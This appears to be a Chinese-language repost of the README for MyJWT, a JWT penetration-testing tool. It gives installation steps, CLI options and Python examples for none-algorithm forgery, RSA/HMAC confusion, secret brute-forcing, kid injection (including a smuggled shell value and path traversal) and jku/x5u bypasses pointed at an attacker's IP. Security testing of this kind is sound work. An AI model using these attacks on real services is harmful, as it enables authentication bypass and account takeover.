MyJWT-Json网站令牌渗透测试工具Json Web Token(JWT)

MyJWT-Json网站令牌渗透测试工具Json Web Token(JWT)

JWT: Json Web Token

MyJWT特色

  • 将新的jwt复制到剪贴板
  • 用户界面
  • 颜色输出
  • 修改jwt(header/Payload)
  • 无漏洞
  • RSA / HMAC混淆
  • 用密钥签名jwt
  • 暴力猜解key
  • 用正则表达式破解jwt以猜测密钥
  • kid 注入
  • Jku Bypass
  • X5u Bypass

安装方法

要安装myjwt,只需使用pip:

pip install myjwt

要从docker映像运行mywt,请运行:

docker run -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt

# mount volume for wordlist
docker run -v $(pwd)/wordlist:/home/wordlist/  -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt
# 在Windows上
docker run -v %CD%/wordlist:/home/wordlist/  -it docker.pkg.github.com/mbouamama/myjwt/myjwt:latest myjwt

要在git上安装myjwt:

git clone https://github.com/mBouamama/MyJWT.git
cd ./MyJWT
pip install -r requirements.txt
python MyJWT/myjwt_cli.py --help

要在BlackArch上安装myjwt:

pacman -S myjwt

安装可能存在的问题

Windows

CryptoGraphy软件包

set INCLUDE=C:\OpenSSL-Win32\include;%INCLUDE%
set LIB=C:\OpenSSL-Win32\lib;%LIB%
pip install cryptography

更多信息在这里

PyOpenSSL软件包

更多信息在这里

安装Make

以admin身份运行powershell并输入:

choco install make

myjwt使用方法

$ myjwt --help
用法: myjwt [参数] JWT


选项:
  --version                    显示版本并退出.
  --full-payload TEXT          jwt的新有效负载。Json格式要求。
  -h, --add-header TEXT        添加一个新的key, value到您的jwt头,如果key存在,
                               旧的 value将被替换。格式:key=value 

  -p, --add-payload TEXT      添加一个新的key到您的jwtpayload,如果key存在,
                              旧的 value将被替换,格式: key=value.

  --sign TEXT                  用给定的密钥签名您的jwt。
  --verify TEXT                验证你的key.
  -none, --none-vulnerability  检查无Alg漏洞。
  --hmac PATH                  检查RS/HMAC Alg漏洞.
  --bruteforce PATH            暴力破解用来签名的秘密token.

  -c, --crack TEXT             regex to iterate all string possibilities to
                               guess the secret used to sign the token.

  --kid TEXT                   Kid Injection sql
  --jku TEXT                   Jku Header to bypass authentication
  --x5u TEXT                   X5u Header to bypass authentication
  --crt TEXT                   For x5cHeader, force crt file
  --key TEXT                   For jku or x5c Header, force private key to
                               your key file

  --file TEXT                  For jku Header and x5u Header, force file name
  --print                      Print Decoded JWT
  -u, --url TEXT               Url to send your jwt.
  -m, --method TEXT            发送请求到url的方法。(默认:get)

  -d, --data TEXT              data发送到您的url.格式: key=value.
                               如果 value = MY_JWT 值将被新的jwt替换

  -c, --cookies TEXT           Cookies发送到您的url.格式: key=value.
                               如果 value = MY_JWT 值将被新的jwt替换

  --help                       显示此消息并退出.

修改JWT

选项类型例子帮助信息
–ful-payloadJSON{“user”: “admin”}jwt的新有效负载。
-h, –add-headerkey=valueuser=admin添加一个新的key, value到您的jwt头,如果key存在,旧的value将被替换。
-p, –add-payloadkey=valueuser=admin向您的jwt有效负载添加一个新的key, value,如果key存在,旧的value将被替换。

检查你的JWT (HS alg)

选项类型例子帮助信息
–signtextmysecretkey用密钥在jwt上签名
–verifytextmysecretkey验证你的key.

Exploit

选项类型例子帮助信息
-none, –none-vulnerabilityNothingCheck None Alg vulnerability.
–hmacPATH./public.pemCheck RS/HMAC Alg vulnerability, and sign your jwt with public key.
–bruteforcePATH./wordlist/big.txtBruteforce to guess th secret used to sign the token. Use txt file with all password stored(1 by line)
–crackREGEX“[a-z]{4}”regex to iterate all string possibilities to guess the secret used to sign the token.
–kidtext“00; echo /etc/.passwd”Kid Injection sql
–jkutextMYPUBLICIPJku Header to bypass authentication, use –file if you want to change your jwks file name, and –key if you want to use your own private pem
–x5utextMYPUBLICIPFor jku or x5c Header, use –file if you want to change your jwks file name, and –key if you want to use your own private pem

发送你的jwt

OptionTypeExamplehelp
-u, –urlurlhttp://challenge01.root-me.org/web-serveur/ch59/adminUrl to send your jwt.
-m, –methodtextPOSTMethod use to send request to url.(Default: GET).
-d, –datakey=valuesecret=MY_JWTData send to your url.Format: key=value. if value = MY_JWT value will be replace by your new jwt.
-c, –cookieskey=valuesecret=MY_JWTCookies to send to your url.Format: key=value.if value = MY_JWT value will be replace by your new jwt.

其他

OptionTypeExamplehelp
–crtPATH./public.crtFor x5cHeader, force crt file
–keyPATH./private.pemFor jku or x5c Header, force private key to your key file
–filetextmyfileFor jku Header, force file name without .json extension
–printNothingPrint Decoded JWT
–helpNothingShow Helper message and exit.
–versionNothingShow Myjwt version

修改你的Jwt

命令行界面

myjwt YOUR_JWT --add-payload "username=admin" --add-header "refresh=false"
from myjwt.modify_jwt import add_header, change_payload
from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt

jwt_json = jwt_to_json(jwt)
jwt_json = add_header(jwt_json, {"kid": "001"})
jwt_json = change_payload(jwt_json, {"username": "admin"})
jwt = encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE]

此处的完整示例:01-modify-jwt

无漏洞

命令行界面

myjwt YOUR_JWT --none-vulnerability

代码

from myjwt.utils import jwt_to_json, SIGNATURE, encode_jwt
from myjwt.vulnerabilities import none_vulnerability
jwt_json = jwt_to_json(jwt)
jwt = none_vulnerability(encode_jwt(jwt_json) + "." + jwt_json[SIGNATURE])

此处的完整示例:02-无漏洞

签名密钥

命令行界面

myjwt YOUR_JWT --sign YOUR_KEY

代码

from myjwt.modify_jwt import signature
from myjwt.utils import jwt_to_json
key = "test"
jwt = signature(jwt_to_json(jwt), key)

完整示例如下:03-sign-key

暴力破解

命令行界面

myjwt YOUR_JWT --bruteforce PATH

代码

from myjwt.vulnerabilities import bruteforce_wordlist
wordlist = "../../wordlist/common_pass.txt"
key = bruteforce_wordlist(jwt, wordlist)

完整示例如下:04-brute-force

破解

命令行界面

myjwt YOUR_JWT --crack REGEX

RSA / HMAC混淆

命令行界面

myjwt YOUR_JWT --hmac FILE

代码

from myjwt.vulnerabilities import confusion_rsa_hmac
file = "public.pem"
jwt = confusion_rsa_hmac(jwt, file)

完整示例如下:05-rsa-hmac-confusion

kid注入

命令行界面

myjwt YOUR_JWT --kid INJECTION

代码

from myjwt.modify_jwt import signature
from myjwt.utils import jwt_to_json
from myjwt.vulnerabilities import inject_sql_kid

injection = "../../../../../../dev/null"
sign = ""
jwt = inject_sql_kid(jwt, injection)
jwt = signature(jwt_to_json(jwt), sign)

完整示例在这里:06-kid-injection

将您的新Jwt发送到url

命令行界面

myjwt YOUR_JWT -u YOUR_URL -c "jwt=MY_JWT" --non-vulnerability --add-payload "username=admin"

Jku漏洞

命令行界面

myjwt YOUR_JWT --jku YOUR_URL

代码

from myjwt.vulnerabilities import jku_vulnerability
new_jwt = jku_vulnerability(jwt=jwt, url="MYPUBLIC_IP")
print(jwt)

此处的完整示例:07-jku-bypass

X5U漏洞

命令行界面

myjwt YOUR_JWT --x5u YOUR_URL

代码

from myjwt.vulnerabilities import x5u_vulnerability
newJwt = x5u_vulnerability(jwt=jwt, url="MYPUBLIC_IP")
print(jwt)

此处的完整示例:08-x5u-bypass

下载地址

GitHub:github.com/mBouamama/MyJWT/releases
雨苁网盘: w.ddosi.workers.dev/github/myjwt/